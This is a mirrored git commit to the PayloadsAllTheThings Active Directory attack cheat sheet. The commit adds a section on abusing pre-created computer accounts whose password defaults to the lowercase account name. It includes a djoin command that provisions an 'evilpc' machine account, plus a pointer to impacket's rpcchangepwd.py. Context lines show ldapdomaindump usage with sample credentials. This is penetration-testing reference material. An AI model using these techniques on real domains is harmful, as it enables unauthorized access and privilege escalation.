mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-14 07:12:54 +00:00
Pre-Created Computer Account
This commit is contained in:
parent
0c7da8ec41
commit
881c354b34
1 changed files with 16 additions and 1 deletions
|
@ -46,6 +46,7 @@
|
||||||
- [Spray passwords against the RDP service](#spray-passwords-against-the-rdp-service)
|
- [Spray passwords against the RDP service](#spray-passwords-against-the-rdp-service)
|
||||||
- [BadPwdCount attribute](#badpwdcount-attribute)
|
- [BadPwdCount attribute](#badpwdcount-attribute)
|
||||||
- [Password in AD User comment](#password-in-ad-user-comment)
|
- [Password in AD User comment](#password-in-ad-user-comment)
|
||||||
|
- [Password of Pre-Created Computer Account](#password-of-pre-created-computer-account)
|
||||||
- [Reading LAPS Password](#reading-laps-password)
|
- [Reading LAPS Password](#reading-laps-password)
|
||||||
- [Reading GMSA Password](#reading-gmsa-password)
|
- [Reading GMSA Password](#reading-gmsa-password)
|
||||||
- [Forging Golden GMSA](#forging-golden-gmsa)
|
- [Forging Golden GMSA](#forging-golden-gmsa)
|
||||||
|
@ -1396,6 +1397,19 @@ ldapdomaindump -u 'DOMAIN\john' -p MyP@ssW0rd 10.10.10.10 -o ~/Documents/AD_DUMP
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
|
### Password of Pre-Created Computer Account
|
||||||
|
|
||||||
|
When `Assign this computer account as a pre-Windows 2000 computer` checkmark is checked, the password for the computer account becomes the same as the computer account in lowercase. For instance, the computer account **SERVERDEMO$** would have the password **serverdemo**.
|
||||||
|
|
||||||
|
```ps1
|
||||||
|
# Create a machine with default password
|
||||||
|
# must be run from a domain joined device connected to the domain
|
||||||
|
djoin /PROVISION /DOMAIN <fqdn> /MACHINE evilpc /SAVEFILE C:\temp\evilpc.txt /DEFPWD /PRINTBLOB /NETBIOS evilpc
|
||||||
|
```
|
||||||
|
|
||||||
|
* When you attempt to login using the credential you should have the following error code : `STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT`.
|
||||||
|
* Then you need to change the password with [rpcchangepwd.py](https://github.com/SecureAuthCorp/impacket/pull/1304)
|
||||||
|
|
||||||
|
|
||||||
### Reading LAPS Password
|
### Reading LAPS Password
|
||||||
|
|
||||||
|
@ -3784,3 +3798,4 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae
|
||||||
* [Introducing MalSCCM - Phil Keeble -May 4, 2022](https://labs.nettitude.com/blog/introducing-malsccm/)
|
* [Introducing MalSCCM - Phil Keeble -May 4, 2022](https://labs.nettitude.com/blog/introducing-malsccm/)
|
||||||
* [Certifried: Active Directory Domain Privilege Escalation (CVE-2022–26923) - Oliver Lyak](https://research.ifcr.dk/certifried-active-directory-domain-privilege-escalation-cve-2022-26923-9e098fe298f4)
|
* [Certifried: Active Directory Domain Privilege Escalation (CVE-2022–26923) - Oliver Lyak](https://research.ifcr.dk/certifried-active-directory-domain-privilege-escalation-cve-2022-26923-9e098fe298f4)
|
||||||
* [bloodyAD and CVE-2022-26923 - soka - 11 May 2022](https://cravaterouge.github.io/ad/privesc/2022/05/11/bloodyad-and-CVE-2022-26923.html)
|
* [bloodyAD and CVE-2022-26923 - soka - 11 May 2022](https://cravaterouge.github.io/ad/privesc/2022/05/11/bloodyad-and-CVE-2022-26923.html)
|
||||||
|
* [DIVING INTO PRE-CREATED COMPUTER ACCOUNTS - May 10, 2022 - By Oddvar Moe](https://www.trustedsec.com/blog/diving-into-pre-created-computer-accounts/)
|
Loading…
Reference in a new issue